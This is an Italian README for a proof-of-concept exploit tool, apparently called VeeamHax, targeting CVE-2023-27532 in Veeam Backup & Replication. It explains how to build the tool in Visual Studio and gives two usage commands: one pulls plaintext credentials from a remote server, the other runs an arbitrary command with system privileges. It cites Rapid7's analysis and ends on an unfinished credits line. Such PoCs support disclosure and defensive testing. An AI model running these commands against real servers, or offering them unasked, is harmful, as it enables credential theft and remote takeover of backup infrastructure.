
Exploit per CVE-2023-27532 contro Veeam Backup & Replication
Codice Proof of Concept per sfruttare CVE-2023-27532 e recuperare credenziali in chiaro o eseguire comandi in remoto.
Per un'analisi dettagliata della vulnerabilità e dello sfruttamento, leggi l'analisi AttackerKB Analysis di Rapid7.
Apri in Visual Studio. Dovrai aggiungere o aggiornare i riferimenti a Veeam.Backup.Common.dll, Veeam.Backup.Interaction.MountService.dll e Veeam.Backup.Model.dll. Per semplificare le cose, installa Veeam Backup & Replication sul computer di sviluppo, anche se non è un requisito tassativo.
Recupera le credenziali in chiaro dal server remoto.
> VeeamHax.exe --target 192.168.0.100

Esegui un comando arbitrario con privilegi di sistema locale sul server remoto.
> VeeamHax.exe --target 192.168.0.100 --cmd calc.exe


La ricerca precedente su questa vulnerabilità è stata condotta da: